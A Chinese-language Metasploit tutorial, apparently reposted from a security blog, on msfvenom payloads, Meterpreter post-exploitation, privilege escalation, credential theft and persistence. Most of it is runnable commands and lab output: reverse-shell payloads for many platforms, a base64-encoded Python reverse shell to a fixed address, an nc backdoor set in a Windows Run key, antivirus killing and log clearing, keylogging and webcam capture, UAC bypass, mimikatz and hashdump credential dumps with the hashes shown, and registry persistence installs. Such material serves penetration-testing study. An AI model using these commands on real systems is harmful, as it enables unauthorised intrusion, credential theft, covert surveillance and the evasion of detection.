1. 安装运行及初始化
安装
bash
1# 安装
2curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
3
4# 安装完成后位置
5# /opt/metasploit-framework/embedded/framework/
6
7# 目录结构
8--modules 重点看这里就行了
9 --auxiliary 主要包含辅助性脚本(扫描、嗅探、注入、爆破,漏洞挖掘)
10 --encoders 主要包含各种编码工具,以便绕过入侵检测和过滤系统
11 --exploits 漏洞利用,包含主流的漏洞利用脚本,exp命名规则:系统/服务/模块
12 --nops 绕过针对溢出攻击滑行字符串的拦截检测
13 --payloads 攻击荷载,主要在目标机器执行代码
14 --post 此目录放着msf的exploit执行成功后,向目标发送的一些功能性指令,如提权,获取hash等
15 --evasion 新增,用来生成免杀payload,类似于集成msfvenom功能
16--data 放了meterpreter ,passiveX,vnc,DLLs,等这些工具和一些用户接口代码,msfweb 和一些其他模块用到的数据文件
17--plugins 这里的模块用户需要load来加载,提供数据库连接插件和各种要用到的插件
18--scripts 这个目录下的文件大都是meterpreter这个模块利用的脚本,比如用到migrate来转移到其他进程的指令的源代码就在此
19--tools 包含一些有用的脚本和零散的工具启动
bash
2. msf基本命令
bash
1show exploits – 查看所有可用的渗透攻击程序代码
2show auxiliary – 查看所有可用的辅助攻击工具
3show options – 查看该模块所有可用选项
4show payloads – 查看该模块适用的所有载荷代码
5show targets – 查看该模块适用的攻击目标类型
6search – 根据关键字搜索某模块
7info – 显示某模块的详细信息
8use – 进入使用某渗透攻击模块
9back – 回退
10set/unset – 设置/禁用模块中的某个参数
11setg/unsetg – 设置/禁用适用于所有模块的全局参数
12save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用3 msfvenom生成payload
bash
1-p, --payload <payload> 指定需要使用的payload(攻击荷载)
2-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
3-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
4-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
5-e, --encoder [encoder] 指定需要使用的encoder(编码器)
6-a, --arch <architecture> 指定payload的目标架构
7 --platform <platform> 指定payload的目标平台
8-s, --space <length> 设定有效攻击荷载的最大长度
9-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
10-i, --iterations <count> 指定payload的编码次数
11-c, --add-code <path> 指定一个附加的win32 shellcode文件
12-x, --template <path> 指定一个自定义的可执行文件作为模板
13-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
14 --payload-options 列举payload的标准选项
15-o, --out <path> 保存payload
16-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
17 --shellest 最小化生成payload
18-h, --help 查看帮助选项
19 --help-formats 查看msf支持的输出格式列表1.可执行程序
Linux
bash
1反向连接:
2msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
3正向连接:
4msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindows
bash
1msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac
bash
1msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho执行方式:直接复制可执行程序到目标机器上执行就行了。
2.Web Payloads
PHP
bash
1msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
2cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASP
bash
1msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSP
bash
1msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR
bash
1msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war执行方式:将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:
bash
1php shell.php3.脚本shell
Python
bash
1msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBash
bash
1msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerl
bash
1msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl执行方式:复制shell.py中的内容在linux命令行下执行:
bash
1python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"4.shellcode Linux Based Shellcode
bash
1msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Windows Based Shellcode
bash
1msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Mac Based Shellcode
bash
1msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>4. Meterpreter基本命令
首先需要先获取meterpreter:
bash
1use exploit/multi/handler
2set payload windows/meterpreter/reverse_tcp
3set LHOST 192.168.81.160
4set ExitOnSession false
5exploit -j -z # -j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
6jobs # 查看后台攻击任务
7kill <id> # 停止某后台攻击任务
8sessions -l # (查看会话)
9sessions -i 2 # 选择会话
10sessions -k 2 # 结束会话如果先获取了cmd,比如利用ms17-010,默认使用的payload返回的就是cmd。这时候我们可以使用sessions-u 2来将cmdshell升级成meterpreter。
获取到了meterpreter,就可以进行后渗透了。
4.1 基本系统命令
bash
1# 会话管理
2background #将当前会话放置后台
3sessions # 查看会话
4sessions -i # 切换会话
5quit # 关闭当前的会话,返回msf终端
6
7# 系统设置
8sysinfo # 查看目标机系统信息
9idletime # 查看目标机闲置时间
10reboot/shutdown # 重启/关机
11
12# shell
13shell # 获得控制台权限
14irb # 进入ruby终端
15
16# 进程迁移
17getpid # 获取当前进程的pid
18ps # 查看当前活跃进程
19migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
20kill <pid值> #杀死进程
21migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
22
23# 执行文件
24execute #在目标机中执行文件
25execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
26
27# 摄像头命令
28webcam_list #查看摄像头列表
29webcam_chat # 查看摄像头接口
30webcam_snap #通过摄像头拍照
31webcam_stream #通过摄像头开启视频
32
33# uictl开关键盘/鼠标
34uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
35uictl disable mouse #禁用鼠标
36uictl disable keyboard #禁用键盘
37
38# 远程桌面/截屏
39enumdesktops #查看可用的桌面
40getdesktop #获取当前meterpreter 关联的桌面
41screenshot #截屏
42use espia #或者使用espia模块截屏 然后输入screengrab
43run vnc #使用vnc远程桌面连接
44
45# 键盘记录
46keyscan_start #开始键盘记录
47keyscan_dump #导出记录数据
48keyscan_stop #结束键盘记录
49
50# 添加用户,开启远程桌面
51# 开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
52run post/windows/manage/enable_rdp #开启远程桌面
53run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
54run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
55
56# 关闭防病毒软件
57run killav
58run post/windows/manage/killav
59
60# 修改注册表
61reg –h # 注册表命令帮助
62upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
63reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的key
64reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
65reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值
66nc -v 192.168.81.162 443 #攻击者连接nc后门
67
68# 清理日志
69clearav #清除windows中的应用程序日志、系统日志、安全日志4.2 文件系统命令
bash
1cat/ls/cd/rm # 基本命令
2search -f *pass* -d C:\\windows # 搜索文件 -h查看帮助
3getwd/pwd # 获取当前目录
4getlwd/lpwd # 操作攻击者主机 查看当前目录
5upload /tmp/hack.txt C:\\lltest # 上传文件
6download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件
7edit c:\\1.txt # 编辑或创建文件 没有的话,会新建文件
8mkdir lltest2 # 只能在当前目录下创建文件夹
9rmdir lltest2 # 只能删除当前目录下文件夹
10lcd /tmp # 操作攻击者主机 切换目录
11
12# timestomp伪造文件时间戳
13timestomp C:// -h #查看帮助
14timestomp -v C://2.txt #查看时间戳
15timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt4.3 网络命令
bash
1# 基本
2ipconfig/ifconfig
3netstat –ano
4arp
5getproxy #查看代理信息
6route #查看路由
7
8# portfwd端口转发
9portfwd add -l 6666 -p 3389 -r 127.0.0.1 # 将目标机的3389端口转发到本地6666端口
10rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码
11
12
13# 添加路由
14
15# 方式一autoroute (deprecated)
16run autoroute –h #查看帮助
17run autoroute -s 192.168.2.0/24 #添加到目标环境网络
18run autoroute –p #查看添加的路由
19# 方式二post/multi/manage/autoroute
20run post/multi/manage/autoroute CMD=autoadd #自动添加到目标环境网络
21run post/multi/manage/autoroute CMD=print # 查看添加的路由
22(Specify the autoroute command (Accepted: add, autoadd, print, delete, default))
23
24# 然后可以利用arp_scanner、portscan等进行扫描
25run arp_scanner -r 192.168.2.0/24
26run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
27run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0
28
29# autoroute添加完路由后,还可以利用msf自带的模块进行socks代理
30# msf提供了2个模块用来做socks代理。
31# auxiliary/server/socks_proxy
32# use auxiliary/server/socks_unc
33# 先background退出来,然后:
34use auxiliary/server/socks_proxy
35set srvhost 127.0.0.1
36set srvport 1080
37run
38
39# 然后vi /etc/proxychains.conf #添加 socks5 127.0.0.1 1080
40# 最后proxychains 使用Socks5代理访问
41
42# sniffer抓包
43use sniffer
44sniffer_interfaces #查看网卡
45sniffer_start 2 #选择网卡 开始抓包
46sniffer_stats 2 #查看状态
47sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包
48sniffer_stop 2 #停止抓包4.4 信息收集
bash
1# 信息收集的脚本位于:
2# modules/post/windows/gather
3# modules/post/linux/gather
4# 以下列举一些常用的
5run post/windows/gather/checkvm #是否虚拟机
6run post/linux/gather/checkvm #是否虚拟机
7run post/windows/gather/forensics/enum_drives #查看分区
8run post/windows/gather/enum_applications #获取安装软件信息
9run post/windows/gather/dumplinks #获取最近的文件操作
10run post/windows/gather/enum_ie #获取IE缓存
11run post/windows/gather/enum_chrome #获取Chrome缓存
12run post/windows/gather/enum_patches #补丁信息
13run post/windows/gather/enum_domain #查找域控4.5 提权
1.getsystem提权 getsystem工作原理: ①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。 ②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。 ③Windows服务已启动,导致与命名管道建立连接。 ④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。 然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。
bash
1getsystem 2.bypassuac 用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。
msf提供了如下几个模块帮助绕过UAC:
bash
1msf5 auxiliary(server/socks5) > search bypassuac
2
3Matching Modules
4================
5
6 # Name Disclosure Date Rank Check Description
7 - ---- --------------- ---- ----- -----------
8 0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
9 1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
10 2 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
11 3 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
12 4 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
13 5 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
14 6 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
15 7 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限
bash
1# 示例
2meterpreter > getuid
3Server username: SAUCERMAN\TideSec
4meterpreter > background
5[*] Backgrounding session 4...
6msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
7msf5 exploit(windows/local/bypassuac) > set SESSION 4
8SESSION => 4
9msf5 exploit(windows/local/bypassuac) > run
10
11[-] Handler failed to bind to 192.168.81.160:4444:- -
12[-] Handler failed to bind to 0.0.0.0:4444:- -
13[*] UAC is Enabled, checking level...
14[+] UAC is set to Default
15[+] BypassUAC can bypass this setting, continuing...
16[+] Part of Administrators group! Continuing...
17[*] Uploaded the agent to the filesystem....
18[*] Uploading the bypass UAC executable to the filesystem...
19[*] Meterpreter stager executable 73802 bytes long being uploaded..
20[*] Sending stage (206403 bytes) to 192.168.81.154
21[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
22[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
23[*] Exploit completed, but no session was created.
24
25# 然后返回新的meterpreter会话,继续执行getsystem本应该会提权成功
26# 然鹅这里失败了3.内核漏洞提权
无论是linux还是windows都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等,msf也集成了这些漏洞的利用模块。
bash
1meterpreter > run post/windows/gather/enum_patches #查看补丁信息
2msf5 > use exploit/windows/local/ms13_053_schlamperei
3msf5 > set SESSION 2
4msf5 > exploit
5
6# 示例
7meterpreter > run post/windows/gather/enum_patches
8
9[+] KB2871997 is missing
10[+] KB2928120 is missing
11[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
12[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
13[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
14[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
15[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
16[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
17meterpreter > background
18[*] Backgrounding session 4...
19msf5 exploit(windows/local/bypassuac) > search MS13-081
20
21Matching Modules
22================
23
24 # Name Disclosure Date Rank Check Description
25 - ---- --------------- ---- ----- -----------
26 0 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page
27
28
29msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
30msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
31session => 4
32msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit
33
34[!] SESSION may not be compatible with this module.
35[-] Handler failed to bind to 192.168.81.160:4444:- -
36[-] Handler failed to bind to 0.0.0.0:4444:- -
37[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
38[*] Exploit completed, but no session was created.
39# 然鹅失败了,摸摸头4.6 获取凭证
在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者hash,再尝试登录内网其它服务器,可能取得意想不到的效果。
1.使用mimikatz
bash
1load mimikatz #help mimikatz 查看帮助
2wdigest #获取Wdigest密码
3mimikatz_command -f samdump::hashes #执行mimikatz原始命令
4mimikatz_command -f sekurlsa::searchPasswords
5
6# 示例
7meterpreter > load mimikatz
8Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
9Success.
10meterpreter > wdigest
11[!] Not currently running as SYSTEM
12[*] Attempting to getprivs ...
13[+] Got SeDebugPrivilege.
14[*] Retrieving wdigest credentials
15wdigest credentials
16===================
17
18AuthID Package Domain User Password
19------ ------- ------ ---- --------
200;997 Negotiate NT AUTHORITY LOCAL SERVICE
210;996 Negotiate WORKGROUP SAUCERMAN$
220;48748 NTLM
230;999 NTLM WORKGROUP SAUCERMAN$
240;476238 NTLM SAUCERMAN TideSec 123456
250;476209 NTLM SAUCERMAN TideSec 123456
26
27meterpreter > mimikatz_command -f samdump::hashes
28Ordinateur : saucerman
29BootKey : 691cff33caf49e933be97fcee370256a
30RegOpenKeyEx SAM : (0x00000005) �ݿ�
31Erreur lors de l'exploration du registre
32meterpreter > mimikatz_command -f sekurlsa::searchPasswords
33[0] { TideSec ; SAUCERMAN ; 123456 }
34[1] { TideSec ; SAUCERMAN ; 123456 }
35[2] { SAUCERMAN ; TideSec ; 123456 }
36[3] { SAUCERMAN ; TideSec ; 123456 }
37[4] { TideSec ; SAUCERMAN ; 123456 }
38[5] { TideSec ; SAUCERMAN ; 123456 }- 使用meterpreter的run hashdump命令
bash
1meterpreter > run hashdump
2
3[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
4[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
5[*] Obtaining the boot key...
6[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
7/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
8[*] Obtaining the user list and keys...
9[*] Decrypting user keys...
10/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
11/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
12/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
13[*] Dumping password hints...
14
15TideSec:"123456"
16
17[*] Dumping password hashes...
18
19
20Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
21Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
22TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::3.post/windows/gather/smart_hashdump
从上面也可以看出官方推荐post/windows/gather/smart_hashdump
bash
1meterpreter > run post/windows/gather/smart_hashdump
2
3[*] Running module against SAUCERMAN
4[*] Hashes will be saved to the database if one is connected.
5[+] Hashes will be saved in loot in JtR password file format to:
6[*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt
7[*] Dumping password hashes...
8[*] Running as SYSTEM extracting hashes from registry
9[*] Obtaining the boot key...
10[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
11[*] Obtaining the user list and keys...
12[*] Decrypting user keys...
13[*] Dumping password hints...
14[+] TideSec:"123456"
15[*] Dumping password hashes...
16[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
17[+] TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::4.powerdump 同 hashdump,但失败了
bash
1meterpreter > run powerdump
2[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
3[*] Running PowerDump to extract Username and Password Hashes...
4[*] Uploaded PowerDump as 69921.ps1 to %TEMP%...
5[*] Setting ExecutionPolicy to Unrestricted...
6[*] Dumping the SAM database through PowerShell...
7
8[-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.4.7 假冒令牌
在用户登录windows操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的session或者cookie。
msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
bash
1# 1.incognito假冒令牌
2use incognito #help incognito 查看帮助
3list_tokens -u #查看可用的token
4impersonate_token 'NT AUTHORITY\SYSTEM' #假冒SYSTEM token
5或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
6execute -f cmd.exe -i –t # -t 使用假冒的token 执行
7或者直接shell
8rev2self #返回原始token
9
10# 2.steal_token窃取令牌
11steal_token <pid值> #从指定进程中窃取token 先ps
12drop_token #删除窃取的token4.8 植入后门
Meterpreter仅仅是在内存中驻留的Shellcode,只要目标机器重启就会丧失控制权,下面就介绍如何植入后门,维持控制。
1.persistence启动项后门
路径:metasploit/scripts/meterpreter/persistence
原理是在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本,在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项,很容易被杀软拦截,官方不推荐
bash
1run persistence –h #查看帮助
2run persistence -X -i 5 -p 4444 -r 192.168.81.160
3#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
4# 示例
5meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160
6
7[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
8[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
9[*] Running Persistence Script
10[*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc
11[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444
12[*] Persistent agent script is 99630 bytes long
13[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
14[*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
15[+] Agent executed with PID 3540
16[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
17[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua能实现同样功能的脚本还有:exploit/windows/local/persistence
2.metsvc服务后门
在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本 在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项。通过服务启动,需要管理员权限,官方不推荐使用,运行失败
bash
1run metsvc –A #自动安装后门
2
3# 示例
4meterpreter > run metsvc –A
5
6[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
7[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
8[*] Creating a meterpreter service on port 31337
9[*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH...
10[*] >> Uploading metsrv.x86.dll...
11[*] >> Uploading metsvc-server.exe...
12[*] >> Uploading metsvc.exe...
13[*] Starting the service...
14 Cannot open service manager (0x00000005)
15
16meterpreter > ls
17Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH
18========================================================
19
20Mode Size Type Last modified Name
21---- ---- ---- ------------- ----
22100666/rw-rw-rw- 178688 fil 2019-06-12 06:46:20 -0700 metsrv.dll
23100777/rwxrwxrwx 45056 fil 2019-06-12 06:46:21 -0700 metsvc-server.exe
24100777/rwxrwxrwx 61440 fil 2019-06-12 06:46:21 -0700 metsvc.exe三个文件上传成功,但服务没有启动起来,失败了。使用-r参数可卸载服务。
3.persistence_exe
再来看看官方推荐的东西吧
bash
1meterpreter > info post/windows/manage/persistence_exe
2
3 Name: Windows Manage Persistent EXE Payload Installer
4 Module: post/windows/manage/persistence_exe
5 Platform: Windows
6 Arch:
7 Rank: Normal
8
9Provided by:
10 Merlyn drforbin Cousins <drforbin6@gmail.com>
11
12Compatible session types:
13 Meterpreter
14
15Basic options:
16 Name Current Setting Required Description
17 ---- --------------- -------- -----------
18 REXENAME default.exe yes The name to call exe on remote system
19 REXEPATH yes The remote executable to upload and execute.
20 SESSION yes The session to run this module on.
21 STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)
22
23Description:
24 This Module will upload an executable to a remote host and make it
25 Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER
26 will start on user login, SYSTEM will start on system boot but
27 requires privs. SERVICE will create a new service which will start
28 the payload. Again requires privs.
29
30
31
32Module options (post/windows/manage/persistence_exe):
33
34 Name Current Setting Required Description
35 ---- --------------- -------- -----------
36 REXENAME default.exe yes The name to call exe on remote system
37 REXEPATH yes The remote executable to upload and execute.
38 SESSION yes The session to run this module on.
39 STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)此模块将可执行文件上载到远程主机并进行创建持久性。 涉及到四个参数
- REXENAME是拷贝到目标系统中的名字
- EXEPATH是将要上传的后门在本地的位置
- SESSION是选择运行此模块的会话
- STARTUP是启动类型,有USER、SYSTEM、SERVICE这三种取值,USER表示为将在用户登录时启动,SYSTEM表示将在系统启动时启动(需要权限),SERVICE表示将创建一个启动服务项(需要权限)。
尝试一下:
bash
1meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER
2
3[*] Running module against SAUCERMAN
4[*] Reading Payload from file /home/ubuntu/shell.exe
5[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
6[*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
7[+] Agent executed with PID 3684
8[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
9[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
10[*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc4.registry_persistence
完整路径为exploit/windows/local/registry_persistence
和第一种方法类似,此模块将会安装一个payload到注册表的启动项中。
bash
1meterpreter > background
2[*] Backgrounding session 13...
3msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
4msf5 exploit(windows/local/registry_persistence) > show options
5
6Module options (exploit/windows/local/registry_persistence):
7
8 Name Current Setting Required Description
9 ---- --------------- -------- -----------
10 BLOB_REG_KEY no The registry key to use for storing the payload blob. (Default: random)
11 BLOB_REG_NAME no The name to use for storing the payload blob. (Default: random)
12 CREATE_RC true no Create a resource file for cleanup
13 RUN_NAME no The name to use for the 'Run' key. (Default: random)
14 SESSION yes The session to run this module on.
15 SLEEP_TIME 0 no Amount of time to sleep (in seconds) before executing payload. (Default: 0)
16 STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM)
17
18
19Exploit target:
20
21 Id Name
22 -- ----
23 0 Automatic
24
25
26msf5 exploit(windows/local/registry_persistence) > set SESSION 13
27SESSION => 13
28msf5 exploit(windows/local/registry_persistence) > run
29
30[*] Generating payload blob..
31[+] Generated payload, 6048 bytes
32[*] Root path is HKCU
33[*] Installing payload blob..
34[+] Created registry key HKCU\Software\0BaG3zDR
35[+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD
36[*] Installing run key
37[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB
38[*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc同类型的还有其他payload,如exploit/windows/local/vss_persistence,exploit/windows/local/s4u_persistence。
参考
- https://xz.aliyun.com/t/2536
- https://www.anquanke.com/post/id/164525
- https://www.freebuf.com/sectool/118714.html
转自:https://saucer-man.com/information_security/79.html